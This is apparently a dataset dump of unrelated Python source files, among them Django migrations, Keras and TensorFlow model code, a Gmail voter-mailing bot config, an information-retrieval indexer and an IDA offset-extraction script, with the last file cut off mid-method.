text stringlengths 8 6.05M |
|---|
# Generated by Django 3.0.1 on 2020-01-09 16:24
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('shopUser', '0011_auto_20200109_1623'),
]
operations = [
migrations.RenameField(
model_name='category',
old_name='title',
new_name='name',
),
migrations.RenameField(
model_name='product',
old_name='title',
new_name='name',
),
]
|
import socket
import sys
import json
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = 'localhost'
port = 8003
s.connect((host, port))
data = s.recv(1024)
data = data.decode("utf-8")
s.send(b'Thank you from client')
dataj = json.loads(data)
print(type(dataj))
print(dataj)
s.close()
|
import os
import cv2
import sys
import numpy as np
from keras import applications
from keras.models import Model, load_model, Sequential
from keras.layers import GlobalAveragePooling2D, Dropout, Dense
from train_inception import encode_labels, standardize_data, shuffle_data
from keras.preprocessing.image import ImageDataGenerator
from PIL import Image
import itertools
import matplotlib.pyplot as plt
from sklearn.metrics import confusion_matrix, classification_report
from sklearn.utils.multiclass import unique_labels
# def load_examples(dir, max_exampletop_model = Sequential(), resize_height, resize_width):
# """ Loads un-labeled data from dtop_model = Sequential()rectory dir into a global data list.
# max_examples defines the maxtop_model = Sequential()mum number of images to import.
# """
# for idx, i in enumerate(os.listdtop_model = Sequential()r(dir)):
# if idx == max_examples: # ontop_model = Sequential()y read max_examples number of examples
# break
# img = cv2.imread(dir + "/" +top_model = Sequential()i)
# img = cv2.resize(img, (resiztop_model = Sequential()_height, resize_width))
# # append data to array
# assert(data[idx,:,:,:].shapetop_model = Sequential()== img.shape) # asserts image matrix is of the intended shape, and fits data matrix
# data[idx,:,:,:] = img #add ttop_model = Sequential()e array to data
# return data
def plot_confusion_matrix(cm, classes,
normalize=False,
title='Confusion matrix',
cmap=plt.cm.Blues):
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print("Normalized confusion matrix")
else:
print('Confusion matrix, without normalization')
print(cm)
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45)
plt.yticks(tick_marks, classes)
fmt = '.2f' if normalize else 'd'
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, format(cm[i, j], fmt),
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
if __name__ == "__main__":
""" The file can run on two modes:
1. Validation: imports labeled examples, and runs a validation through the model.
Prints the accuracy. Creates a confusion matrix
2. Prediction: imports un-labeled examples, and runs predictions using the model.
Prints the predicted label
"""
model_path = "/home/nyscf/Documents/sarita/cell-classifier/model_resnet_mb10_m4135_e100_do0.4/chkpt_model.32-acc0.82.hdf5"
test_data_dir = "/home/nyscf/Documents/test_images/"
img_size = (224,224)
num_examples_to_load = 22
valid_batch_size = 1
test_datagen = ImageDataGenerator(rescale=1./255)
test_generator = test_datagen.flow_from_directory(test_data_dir,
target_size=img_size,
batch_size=valid_batch_size,
class_mode='binary',
shuffle = False)
print("datagen created")
base_model = applications.resnet50.ResNet50(include_top=False, weights=None,
input_shape = (img_size[0], img_size[1], 3), classes=2)
top_model = Sequential()
top_model.add(Dense(1, activation='sigmoid'))
output_layer = base_model.output
output_layer = GlobalAveragePooling2D()(output_layer)
# top_model.add(output_layer)
model = Model(inputs=base_model.input, outputs=top_model(output_layer))
model.load_weights(model_path)
model.compile(loss = "binary_crossentropy", optimizer = 'adam', metrics = ["acc"]) #used accuracy metric for 2 classes, supposedly catetgorical acc gets selected automatically when using cat cross ent
prob = model.predict_generator(test_generator, steps=num_examples_to_load, verbose=1)
print(prob)
y_pred = (prob < 0.5).astype(np.int)
# y_pred = np.argmax(prob, axis=1)
print("y_pred: ", y_pred)
y_true = test_generator.classes
print("y_true: ", y_true)
target_names = ['bad','viable']
print(classification_report(y_true, y_pred, target_names=target_names))
cm = confusion_matrix(y_true, y_pred)
print(cm)
# Plot non-normalized confusion matrix
plot_confusion_matrix(cm, classes=target_names,
title='Confusion matrix, without normalization')
plt.show()
"""
if sys.argv[1] == "predict":
model_path = "/home/nyscf/Documents/sarita/cell-classifier/model_resnet_mb10_m4135_e100_doNone_preprocessing/chkpt_model.28-acc0.92.hdf5"
image_path = "/home/nyscf/Documents/test_images/bad"
img_size = (224,224)
num_examples_to_load = 13
image_gen = ImageDataGenerator()
gen = image_gen.flow_from_directory(image_path, batch_size=1)
index=0
image, label = gen._get_batches_of_transformed_samples(np.array([index]))
image_name = gen.filenames[index]
data = np.empty((num_examples_to_load, img_size[0], img_size[1], 3), dtype=np.uint8)
data = load_examples(image_path, num_examples_to_load, img_size[0], img_size[1])
# model = create_model()
# model.load_weights(model_path)
loaded_model = load_model(model_path)
predictions = loaded_model.predict(data)
viable_tag = predictions[0]
correct_pred = 0
incorrect_pred = 0
print(predictions.shape)
print(str(predictions))
prediction_csv = pd.DataFrame(predictions, columns=['predictions']).to_csv('/home/nyscf/Documents/test_images/predictions.csv')
""" |
CLIENT_SECRET_FILE_PATH = "secrets/client_secret.json"
SEEN_EMAIL_DATA_FILE_PATH = "data/seen_email_data.json"
UNUSED_VOTERS_FILE_PATH = "data/unused_voters.json"
ERROR_LOG_FILE_PATH = "logs/error_log.txt"
ROUTINE_ACTION_LOG_FILE_PATH = "logs/routine_log.txt"
ABNORMAL_ACTION_LOG_FILE_PATH = "logs/abnormal_log.txt"
IGNORE_LOG_FILE_PATH = "logs/ignored_log.txt"
SCOPES = ['https://www.googleapis.com/auth/gmail.readonly',
'https://www.googleapis.com/auth/gmail.send',
'https://www.googleapis.com/auth/gmail.modify']
NUMBER_OF_VOTERS_TO_SEND = 10
def read_file(file_path):
with open(file_path) as f:
data = f.read()
return data
base = read_file('secrets/bot_messages/disclaimer_prefix.txt') + '\n\n'
BOT_MESSAGES = dict(
MESSAGE_FOR_ASKING_IF_PEOPLE_WANT_MORE=base + read_file('secrets/bot_messages/message_for_asking_if_people_want_more.txt'),
MESSAGE_WHEN_BOT_DOESNT_UNDERSTAND=base + read_file('secrets/bot_messages/message_when_bot_doesnt_understand.txt'),
MESSAGE_WHEN_SENDING_VOTERS=base + read_file('secrets/bot_messages/message_when_sending_voters.txt'),
MESSAGE_WHEN_SOMEONE_CANT_MAIL_THEIR_VOTERS=base + read_file('secrets/bot_messages/message_when_someone_cant_mail_their_voters.txt'),
)
# DON'T CHANGE THE ORDER OF THESE
VOTER_DATA_FIELDS = ['name', 'street_address', 'apt_number', 'zip_code', 'city']
|
# Generated by Django 2.2.2 on 2019-06-08 09:24
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('myapp', '0003_auto_20190607_1502'),
]
operations = [
migrations.AddField(
model_name='showtimes',
name='active',
field=models.BooleanField(default=True),
),
]
|
from django.urls import path
from rest_framework.routers import DefaultRouter
from user.views import UserViewSet, AuthView, Logout, RetrieveCountryCityView
router = DefaultRouter(trailing_slash=False)
router.register('users', UserViewSet, basename='users')
urlpatterns = router.urls
urlpatterns += [
path('login', AuthView.as_view(), name='login'),
path('logout', Logout.as_view()),
path('country_data', RetrieveCountryCityView.as_view(), name="country_data"),
]
|
Your input
"the sky is blue"
Output
"blue is sky the"
Expected
"blue is sky the"
Your input
"poetry lover"
Output
"lover poetry"
Expected
"lover poetry" |
# import libraries
from tkinter import *
from gtts import gTTS
from playsound import playsound
# Create window
root = Tk()
root.geometry("600x300")
root.config(bg="white")
root.title("TEXT TO SPEECH")
# Bottom heading
bottom_label = Label(root, text="text to speech app", font="arial 20 italic",
bg="yellow").pack(fill=X, side=BOTTOM)
# Search label
top_label = Label(root, text="ENTER TEXT BELOW", font="arial 20 bold underline",
bg="yellow").pack(fill=X, side=TOP)
# Text variable
Msg = StringVar()
# Entry
entry_field = Entry(root, textvariable=Msg, font="aerial 35 bold")
entry_field.pack(fill=X)
# Define function
def text_to_speech():
message = entry_field.get()
speech = gTTS(text=message)
speech.save("test.mp3")
playsound("test.mp3")
def close():
root.destroy()
def clear():
Msg.set("")
# Button
Button(root, text="PLAY", font="arial 25 bold", command=text_to_speech, bg="light green").pack(fill=X)
Button(root, text="CLEAR", font="arial 25 bold", command=clear, bg="orange").pack(fill=X)
Button(root, text="EXIT", font="arial 25 bold", command=close, bg="Red").pack(fill=X)
# Infinite loop to run program
root.mainloop()
|
'''Es un error en tiempo de ejecucion, la sintaxis del codigo es correcta pero durante la ejecucion ha ocurrido "algo inseperado " '''
'''El problema es que en los lenguajes que ejecutan el codigo asia abajo, una vez que el rpgrama nos da error el resto de lineas no se ejecutan '''
def suma(num1,num2):
return num1+num2
def resta(num1,num2):
return num1-num2
def multiplicacion(num1,num2):
return num1*num2
def divide(num1,num2):
try:
return num1/num2
except ZeroDivisionError:
print("No se puede vividir entre 0")
return "Operacion erronea"
while(True):
try:
op1=(int(input("introduce el primer valor: ")))
op2=(int(input("introduce el segundo valor: ")))
break
except ValueError:
print("Los valores intorducidos no son correctos ")
operacion=input("introduce la operacion a realizar(suma, resta, multiplicacion, divide)")
if operacion =="suma":
print(suma(op1,op2))
elif operacion == "resta":
print(resta(op1,op2))
elif operacion == "multiplicacion":
print(multiplicacion(op1,op2))
elif operacion == "divide":
print(divide(op1,op2))
else :
print(f"Operacion no contemplada ")
print("Ejecucion del programa finalizada : continua con el progra") |
#! /usr/bin/env python
from collections import Counter
from bs4 import BeautifulSoup
from RetrievalModel import TfIdf, CosineSimilarity, BM25
import os
import glob
import operator
class Retriever:
def __init__(self):
return
def get_corpus(self, req=True):
corpus = self.build_index(req)
return corpus
def get_total_corpus(self, folder='clean'):
cwd = os.getcwd()
if folder == 'clean':
fol = os.path.join(cwd, 'clean_cacm')
else:
fol = os.path.join(cwd, 'stopped_cacm')
os.chdir(fol)
total_corpus = {}
for eachfile in glob.glob('*.html'):
docid = eachfile[:-5]
content = open(eachfile).read()
content_as_list = content.split()
total_corpus[docid] = content_as_list
os.chdir('..')
return total_corpus
def clean_corpus(self):
cwd = os.getcwd()
cacm = os.path.join(cwd, 'cacm')
clean_cacm = os.path.join(cwd, 'clean_cacm')
if not os.path.exists(cacm):
print "Corpus doesn't exist. It is created now. " \
"PLease put raw files inside the corpus folder"
os.makedirs(cacm, 0755)
return
if not os.path.exists(clean_cacm):
os.makedirs(clean_cacm, 0755)
os.chdir(cacm)
for eachfile in glob.glob('*.html'):
content = open(eachfile).read()
content = BeautifulSoup(content, 'html.parser')
content = content.get_text().encode('utf-8')
clean_content = self.clean_content(content, True)
clean_file = open(os.path.join(clean_cacm, eachfile), 'w')
clean_file.write(clean_content)
clean_file.close()
def clean_content(self, content, not_query):
ignore_list = ['!', '@', '#', '$', '^', '&', '*', '(', ')', '_', '+', '=', '{', '[', '}', ']', '|',
'\\', '"', "'", ';', '/', '<', '>', '?', '%']
content = content.translate(None, ''.join(ignore_list))
content = content.replace(':', ' ')
content = content.replace('-', ' ')
content = content.split()
last = 0
if not_query:
for i, v in enumerate(reversed(content)):
if 'AM' in v or 'PM' in v:
last = len(content) - i - 1
break
content = content[0:last+1]
final_content = ''
for eachword in content:
if len(eachword) > 1 and eachword[0] == '-':
eachword = eachword[1:]
eachword = eachword.lower()
eachword = eachword.strip('.,-')
if eachword == '-':
continue
final_content += eachword + ' '
return final_content
def build_index(self,need_index=True, folder='clean'):
cwd = os.getcwd()
if folder == 'clean':
fol = os.path.join(cwd, 'clean_cacm')
else:
fol = os.path.join(cwd, 'stopped_cacm')
os.chdir(fol)
inverted_index = {}
total_corpus = {}
for eachfile in glob.glob('*.html'):
docid = eachfile[:-5]
content = open(eachfile).read()
content_as_list = content.split()
total_corpus[docid] = content_as_list
if not need_index:
continue
word_count = dict(Counter(content_as_list))
for token in content_as_list:
if token not in inverted_index:
temp = dict()
temp[docid] = word_count[token]
inverted_index[token] = temp
else:
temp = inverted_index[token]
temp[docid] = word_count[token]
inverted_index[token] = temp
os.chdir('..')
return inverted_index, total_corpus
def run_all_queries(self, inverted_index, total_corpus, relevance_data,
query_dict, model='bm25', task_id='', notes='', store_queries ='', ret=False):
results = []
bm = BM25(inverted_index, total_corpus, relevance_data)
tf_idf = TfIdf(inverted_index, total_corpus)
cosine = CosineSimilarity(inverted_index, total_corpus)
for query_id in query_dict:
query = self.clean_content(query_dict[query_id], False)
if model == 'tfidf':
ranks = tf_idf.get_tf_idf(query)
elif model == 'cosine':
ranks = cosine.get_cosine_similarity(query)
else:
ranks = bm.calculate_bm25(query, query_id)
sorted_results = sorted(ranks.items(), key=operator.itemgetter(1), reverse=True)
sorted_results = sorted_results[:100]
rank = 1
for each in sorted_results:
tup = (query_id, each[0], rank, each[1], model)
results.append(tup)
rank += 1
if ret:
return results
result_file_name = 'task'+task_id+'_'+model+"_"+notes+'.txt'
if task_id == '':
task_folder = os.getcwd()
else:
task_folder = os.path.join(os.getcwd(), 'task'+task_id)
if not os.path.exists(task_folder):
os.makedirs(task_folder, 0755)
all_runs = os.path.join(os.getcwd(), 'all_runs')
if not os.path.exists(all_runs):
os.makedirs(all_runs, 0755)
if store_queries != '':
query_file_name = store_queries+"_queries.txt"
qf = open(os.path.join(task_folder, query_file_name), 'w')
for each in query_dict:
qf.write("{} {}\n".format(str(each), query_dict[each]))
f1 = open(os.path.join(task_folder, result_file_name), 'w')
f2 = open(os.path.join(all_runs, result_file_name), 'w')
for each in results:
f1.write('{} {} {} {} {} {}\n'.format(each[0], 'Q0', each[1], each[2], each[3], model))
f2.write('{} {} {} {} {} {}\n'.format(each[0], 'Q0', each[1], each[2], each[3], model))
f1.close()
f2.close()
|
from django.contrib import admin
from .models import Blog
class BlogAdmin(admin.ModelAdmin):
#be chia dasyresi dashte bashim
# fields=['title','content']
fieldsets = [
('title', {'fields': ['title']}),
('content information',{'fields': ['content', 'author']}),
('image', {'fields':['image']}),
]
list_display=['title' ,'content', 'date']
search_fields=['title' , 'content']
admin.site.register(Blog , BlogAdmin) |
from idc import *
from idautils import *
from Tkinter import Tk
from operator import itemgetter
from collections import OrderedDict
import idaapi
import random
MAX_XREFS = 500
Offsets = {}
BaseOffsets = {}
def FindCallOffsetValue(address):
trueOffset = None
baseOffset = ""
subOffset = ""
leadAddy = ""
secondReg = ""
thirdReg = ""
i = 0
while i < 15:
address = idc.prev_head(address, minea=0)
currentInstruction = generate_disasm_line(address, 0)
if i == 1:
leadAddy = print_operand(address, 0)
if currentInstruction.find("mov " + leadAddy) != -1:
secondReg = print_operand(address, 1)
if currentInstruction.find("call") != -1:
currentInstruction = currentInstruction.replace("call", "")
currentInstruction = currentInstruction.replace(" ", "")
nameOfAddress = get_name_ea_simple(currentInstruction)
z = 0
while z < 8:
currentInstruction = generate_disasm_line(nameOfAddress, 0)
if currentInstruction.find("lea " + secondReg) != -1:
temp = print_operand(nameOfAddress, 1)
additionSignIndex = temp.find("+")
thirdReg = temp[:additionSignIndex].replace("[", "")
subOffset = temp[additionSignIndex + 1:].replace("h]", "")
nameOfAddress = idc.next_head(nameOfAddress)
z = z + 1
if thirdReg != "":
q = 0
currentAddress = address
while q < 8:
currentInstruction = generate_disasm_line(currentAddress, 0)
if currentInstruction.find("lea " + thirdReg) != -1 or currentInstruction.find("lea " + thirdReg) != -1:
temp = print_operand(currentAddress, 1)
additionSignIndex = temp.find("+") + 1
baseOffset = temp[additionSignIndex:].replace("h]", "")
break
currentAddress = idc.prev_head(currentAddress, minea=0)
q = q + 1
i = i + 1
try:
trueOffset = int(baseOffset, 16) + int(subOffset, 16)
except ValueError:
pass
return trueOffset
def FindBaseOffsetValue(address, subOffset):
ea = get_name_ea_simple(get_func_name(address))
xrefs = list(XrefsTo(ea, 0))
xrefs = list(filter(lambda xref: SegName(xref.frm) != ".rdata", xrefs))
if MAX_XREFS != -1:
xrefs = random.sample(xrefs, min(len(xrefs), MAX_XREFS))
trueOffset = None
baseOffset = ""
leadAddy = ""
if len(xrefs) < 4:
for xref in xrefs:
caller = xref.frm
i = 0
while i < 300:
caller = idc.prev_addr(caller)
currentInstruction = print_insn_mnem(caller) + " " + print_operand(caller, 0)
if i == 1:
leadAddy = print_operand(caller, 0)
if currentInstruction.find("lea " + leadAddy) != -1:
temp = print_operand(caller, 1)
additionSignIndex = temp.find("+") + 1
baseOffset = temp[additionSignIndex:].replace("h]", "")
break
i = i + 1
BaseOffsets[ea] = baseOffset
try:
trueOffset = int(baseOffset, 16) + int(subOffset, 16)
except ValueError:
pass
return trueOffset
def CreateOffsets(address, currentAddress, leadAddy, i, checkPoint):
offset = None
nameOfOffset = ""
lastInstruction = ""
while i < 8:
address = idc.prev_head(address, minea=0)
currentInstruction = generate_disasm_line(address, 0)
if lastInstruction == "align 10h":
if currentInstruction == "retn 4":
break
lastInstruction = currentInstruction
if currentInstruction.find("push offset ") != -1:
currentInstruction = currentInstruction.replace("push offset ", "")
endIndex = currentInstruction.find(";")
currentInstruction = currentInstruction[:endIndex]
addressOfName = get_name_ea_simple(currentInstruction)
nameOfOffset = GetString(addressOfName, -1, 0)
if i == checkPoint:
if currentInstruction.find("push edi") == -1 and currentInstruction.find("push esi") == -1 and currentInstruction.find("push ebp") == -1 and currentInstruction.find("push ebx") == -1 and currentInstruction.find("push esp") == -1:
checkPoint = checkPoint + 1
else:
instructionBeforeLine = generate_disasm_line(idc.prev_head(address, minea=0), 0)
if instructionBeforeLine.find("push edi") == -1 and instructionBeforeLine.find("push esi") == -1 and instructionBeforeLine.find("push ebp") == -1 and instructionBeforeLine.find("push ebx") == -1 and instructionBeforeLine.find("push esp") == -1:
leadAddy = print_operand(address, 0)
else:
checkPoint = checkPoint + 1
if currentInstruction.find("add ") != -1:
temp = print_operand(address, 1)
additionSignIndex = temp.find("+") + 1
subOffset = temp[additionSignIndex:].replace("h", "")
functionAddress = get_name_ea_simple(get_func_name(address))
trueOffset = None
if int(subOffset, 16) < 1024:
if functionAddress in BaseOffsets:
try:
trueOffset = int(BaseOffsets.get(functionAddress), 16) + int(subOffset, 16)
except ValueError:
pass
if trueOffset != None:
offset = trueOffset
if trueOffset == None:
offset = FindBaseOffsetValue(address, subOffset)
else:
offset = int(subOffset, 16)
if currentInstruction.find("lea " + leadAddy) != -1:
temp = print_operand(address, 1)
additionSignIndex = temp.find("+") + 1
if currentInstruction.find("h") != -1:
offset = temp[additionSignIndex:].replace("h]", "")
offset = int(offset, 16)
else:
break
if get_first_fcref_to(address) != 4294967295:
testAddressForCall = get_first_fcref_to(address)
if generate_disasm_line(testAddressForCall, 0).find("call") == -1:
if offset == None or nameOfOffset == "":
CreateOffsets(testAddressForCall, testAddressForCall, leadAddy, i, checkPoint)
elif offset != None and nameOfOffset != "":
break
i = i + 1
if nameOfOffset == "":
nameOfOffset = "NO NAME"
if offset == None:
if nameOfOffset != "NO NAME":
offset = FindCallOffsetValue(currentAddress)
if offset == None:
offset = 65535
if nameOfOffset not in Offsets:
if nameOfOffset != "NO NAME":
if offset != 65535:
Offsets[nameOfOffset] = offset
else:
if nameOfOffset != "NO NAME":
if Offsets.get(nameOfOffset) == 65535:
Offsets[nameOfOffset] = offset
if offset != 65535:
Offsets[nameOfOffset] = offset
def GenerateList(ea):
xrefs = list(XrefsTo(ea, 0))
xrefs = list(filter(lambda xref: SegName(xref.frm) != ".rdata", xrefs))
for xref in xrefs:
address = xref.frm
currentAddress = address
checkPoint = 1
i = 0
leadAddy = ""
CreateOffsets(address, currentAddress, leadAddy, i, checkPoint)
|
import pandas as pd
import numpy as np
import inquirer
import math
from ..config.config import Config
from matplotlib import pyplot as plt
from collections import Counter
from sklearn.linear_model import LinearRegression
from sklearn.neighbors import KNeighborsRegressor
from sklearn.preprocessing import LabelEncoder
class HealthCareManager:
def __init__(self):
self.config = Config()
self._choices = ["Analyze data", "Clean Data"]
self._questions = [
inquirer.List(
"options",
message="Which part of the first question",
choices=self._choices,
),
]
def initialize(self):
"""Method that manages what to to in health care manager question"""
answer = inquirer.prompt(self._questions)
if answer["options"] == self._choices[0]:
self.analyze_data()
elif answer["options"] == self._choices[1]:
matrices = self.clean_data()
else:
exit(0)
# To Do -> CLEAN UP
def analyze_data(self):
"""Reads the data file from config"""
data = pd.read_csv(self.config.health_care_csv_path)
# Replace boolean values to be verbose
# TO DO -> Do it with pandas replace methods
data["stroke"] = ["No stroke" if x == 0 else "Had a stroke" for x in data["stroke"]]
data["hypertension"] = ["No hypertension" if x == 0 else "Had hypertension" for x in data["hypertension"]]
data["ever_married"] = ["Never married" if x == "No" else "Has Married Before" for x in data["ever_married"]]
data["heart_disease"] = ["No heart disease" if x == 0 else "Had heart disease" for x in data["heart_disease"]]
# Create counters for all enumerable data
data_keys, data_values = [], []
enumerable_counters = {}
for key in data.drop(["age", "avg_glucose_level", "bmi", "id"], axis="columns"):
enumerable_counters[key] = Counter(data[key]).most_common()
for item in enumerable_counters[key]:
data_keys.append(item[0])
data_values.append(item[1])
# Enumerable Groupings of People
_, groupings_axes = plt.subplots()
groupings_axes.barh(data_keys, [(x / len(data)) * 100 for x in data_values])
groupings_axes.set_title("Percentage of people in enumerable groupings")
groupings_axes.set_xlabel("Percentage of People")
groupings_axes.set_ylabel("Enumerable Groupings of People")
# Scatter plot for age and weight
_, scatter = plt.subplots()
im = scatter.scatter(
data["age"],
data["avg_glucose_level"],
c=data["bmi"],
cmap="Greens",
edgecolors="black",
linewidth=1,
alpha=0.75,
)
scatter.set_title("Age in relation with Average Glucose Level")
scatter.set_xlabel("Age")
scatter.set_ylabel("Average Glucose Level")
clb = plt.colorbar(im)
clb.ax.tick_params(labelsize=8)
clb.ax.set_title("BMI", fontsize=8)
# Enumerable percentages
# TO DO -> Make size dynamic
_, pie_axes = plt.subplots(nrows=2, ncols=4)
for i, item in enumerate(enumerable_counters):
pie_axes[math.floor(i / 4)][i % 4].pie(
[x[1] for x in enumerable_counters[item]], labels=[x[0] for x in enumerable_counters[item]]
)
pie_axes[math.floor(i / 4)][i % 4].set_title(item)
plt.show()
def clean_data(self):
"""Runs the second question and cleans data"""
# Replace the unknown values of the smoking columns as nan, so pandas can auto remove
data = pd.read_csv(self.config.health_care_csv_path, na_values=["Unknown"])
# Method ONE: Remove columns
removed_column_method = data.copy()
removed_column_method.dropna(how="any", axis="columns", inplace=True)
# Method TWO: Fill all nan values with mean of column
# Note: Obviously missing data in the "smoking_status" column will not be replaced, as they don't have a mean value
mean_method = data.copy()
mean_method["bmi"].fillna(mean_method["bmi"].mean(), inplace=True)
# Create train data and prediction matrices for Linear Regression and KNN Regression
train_data = data.copy().dropna(subset=["bmi"], how="any", axis="index").drop("id", axis="columns")
# Apply label encoding and one hot encoding to categorical data
train_data.smoking_status = LabelEncoder().fit_transform(train_data.smoking_status)
train_data.ever_married = train_data.ever_married.replace(["Yes", "No"], [1, 0])
train_data.gender = LabelEncoder().fit_transform(train_data.gender)
train_data = pd.get_dummies(data=train_data)
# Apply encoding to output data as well
predction_matrix = data.copy().drop("id", axis="columns")
predction_matrix.smoking_status = LabelEncoder().fit_transform(predction_matrix.smoking_status)
predction_matrix.gender = LabelEncoder().fit_transform(predction_matrix.gender)
predction_matrix.ever_married = predction_matrix.ever_married.replace(["Yes", "No"], [1, 0])
predction_matrix = pd.get_dummies(data=predction_matrix)
# Create Linear regression Model
linear_regression_model = LinearRegression().fit(train_data.drop("bmi", axis="columns"), train_data["bmi"])
# Method THREE: Fill all nan values with prediction from linear regression
linear_reg_method = data.copy()
# For each element in prediction matrix check if it is np.nan and predict value if it is and place it in data
for i in predction_matrix.index:
linear_reg_method.at[i, "bmi"] = (
linear_regression_model.predict(np.array([predction_matrix.loc[i].drop("bmi", axis="index")]))[0]
if np.isnan(predction_matrix.at[i, "bmi"])
else predction_matrix.at[i, "bmi"]
)
# Method FOUR: Fill all nan values with prediction from KNN
knn_reg_method = data.copy()
knn_model = KNeighborsRegressor(n_neighbors=5).fit(train_data.drop("bmi", axis="columns"), train_data["bmi"])
# For each element in prediction matrix check if it is np.nan and predict value if it is and place it in data
for i in predction_matrix.index:
knn_reg_method.at[i, "bmi"] = (
knn_model.predict(np.array([predction_matrix.loc[i].drop("bmi", axis="index")]))[0]
if np.isnan(predction_matrix.at[i, "bmi"])
else predction_matrix.at[i, "bmi"]
)
return [removed_column_method, mean_method, linear_reg_method, knn_reg_method]
|
from django.contrib import admin
from players.models import Player, Cron, Mop
admin.site.register(Player)
admin.site.register(Cron)
admin.site.register(Mop)
|
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from urllib import urlretrieve
import cPickle as pickle
import os
import gzip
import sys
from util import *
sys.setrecursionlimit(10000)
import numpy as np
import theano
import glob
import numpy
import PIL
from PIL import Image,ImageMath
import lasagne
from lasagne import layers
#Setting the device as CPU, sadly wont work since CNN trained on a CUDA machine.
os.environ['THEANO_FLAGS']="device=cpu"
from lasagne.updates import nesterov_momentum
from lasagne.updates import adadelta
from nolearn.lasagne import NeuralNet
from sklearn.metrics import classification_report
from sklearn.metrics import confusion_matrix
def predCifar():
with open('netpickleCifar','rb') as f:
neuralNet = pickle.load(f)
#loading image into appropriate format
img = Image.open('image.jpg').resize((32,32),PIL.Image.NEAREST)
img = numpy.asarray(img, dtype='float32') / 256.
img_ = img.transpose(2, 0, 1).reshape(1, 3, 32, 32)
#Loading class names
fo = open('batches.meta', 'rb')
dict = pickle.load(fo)
fo.close()
listnames = dict['label_names']
#predictijg
prediction = neuralNet.predict(img_)
return listnames[prediction[0]]
|
# -*- coding: utf-8 -*-
# !/usr/bin/env python
"""End-To-End Memory Networks.
The implementation is based on http://arxiv.org/abs/1503.08895 [1]
"""
from __future__ import absolute_import
from __future__ import division
import tensorflow as tf
import numpy as np
import json
import ConfigParser
from word import Word
from six.moves import range
from data_unit import cut2list
def zero_nil_slot(t, name=None):
"""
Overwrites the nil_slot (first row) of the input Tensor with zeros.
The nil_slot is a dummy slot and should not be trained and influence
the training algorithm.
"""
with tf.op_scope([t], name, "zero_nil_slot") as name:
t = tf.convert_to_tensor(t, name="t")
s = tf.shape(t)[1]
z = tf.zeros(tf.stack([1, s]))
return tf.concat(axis=0, values=[z, tf.slice(t, [1, 0], [-1, -1])], name=name)
def add_gradient_noise(t, stddev=1e-3, name=None):
"""
Adds gradient noise as described in http://arxiv.org/abs/1511.06807 [2].
The input Tensor `t` should be a gradient.
The output will be `t` + gaussian noise.
0.001 was said to be a good fixed value for memory networks [2].
"""
with tf.op_scope([t, stddev], name, "add_gradient_noise") as name:
t = tf.convert_to_tensor(t, name="t")
gn = tf.random_normal(tf.shape(t), stddev=stddev)
return tf.add(t, gn, name=name)
class MemN2N(object):
"""End-To-End Memory Network."""
def __init__(self, batch_size, answer_size, sentence_size, embedding_size,
hops=3,
max_grad_norm=40.0,
nonlin=None,
initializer=tf.random_normal_initializer(stddev=0.1),
session=tf.Session(),
name='MemN2N'):
"""Creates an End-To-End Memory Network
Args:
batch_size: The size of the batch.
vocab_size: The size of the vocabulary (should include the nil word). The nil word
one-hot encoding should be 0.
sentence_size: The max size of a sentence in the data. All sentences should be padded
to this length. If padding is required it should be done with nil one-hot encoding (0).
embedding_size: The size of the word embedding.
hops: The number of hops. A hop consists of reading and addressing a memory slot.
Defaults to `3`.
max_grad_norm: Maximum L2 norm clipping value. Defaults to `40.0`.
nonlin: Non-linearity. Defaults to `None`.
initializer: Weight initializer. Defaults to `tf.random_normal_initializer(stddev=0.1)`.
encoding: A function returning a 2D Tensor (sentence_size, embedding_size). Defaults to `position_encoding`.
session: Tensorflow Session the model is run with. Defaults to `tf.Session()`.
name: Name of the End-To-End Memory Network. Defaults to `MemN2N`.
"""
self.writer = tf.summary.FileWriter("./tensorboard/logs", session.graph)
self.vacob = {}
self.answer = []
self.word = Word()
self._batch_size = batch_size
self._answer_size = answer_size
self._sentence_size = sentence_size
self._embedding_size = embedding_size
self._hops = hops
self._max_grad_norm = max_grad_norm
self._nonlin = nonlin
self._init = initializer
self._name = name
self._build_inputs()
self._build_vars()
self._opt = tf.train.GradientDescentOptimizer(learning_rate=self._lr)
# cross entropy
logits = self._inference(self._queries) # (batch_size, vocab_size)
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=tf.cast(self._answers, tf.float32), name="cross_entropy")
cross_entropy_sum = tf.reduce_sum(cross_entropy, name="cross_entropy_sum")
# loss op
loss_op = cross_entropy_sum
tf.summary.scalar("cost", loss_op)
# gradient pipeline
grads_and_vars = self._opt.compute_gradients(loss_op)
grads_and_vars = [(tf.clip_by_norm(g, self._max_grad_norm), v) for g,v in grads_and_vars]
grads_and_vars = [(add_gradient_noise(g), v) for g,v in grads_and_vars]
nil_grads_and_vars = []
for g, v in grads_and_vars:
if v.name in self._nil_vars:
nil_grads_and_vars.append((zero_nil_slot(g), v))
else:
nil_grads_and_vars.append((g, v))
train_op = self._opt.apply_gradients(nil_grads_and_vars, name="train_op")
# predict ops
predict_op = tf.argmax(logits, 1, name="predict_op")
predict_proba_op = tf.nn.softmax(logits, name="predict_proba_op")
predict_log_proba_op = tf.log(predict_proba_op, name="predict_log_proba_op")
# assign ops
self.loss_op = loss_op
self.predict_op = predict_op
self.predict_proba_op = predict_proba_op
self.predict_log_proba_op = predict_log_proba_op
self.train_op = train_op
init_op = tf.global_variables_initializer()
self._sess = session
self._sess.run(init_op)
self.saver = tf.train.Saver()
self.merge = tf.summary.merge_all()
def _build_inputs(self):
self._queries = tf.placeholder(tf.float32, [None, self._sentence_size, self._embedding_size], name="queries")
self._answers = tf.placeholder(tf.int32, [None, self._answer_size], name="answers")
self._lr = tf.placeholder(tf.float32, [], name="learning_rate")
def _build_vars(self):
with tf.variable_scope(self._name):
A = self._init([self._sentence_size, self._embedding_size])
C = self._init([self._sentence_size, self._embedding_size])
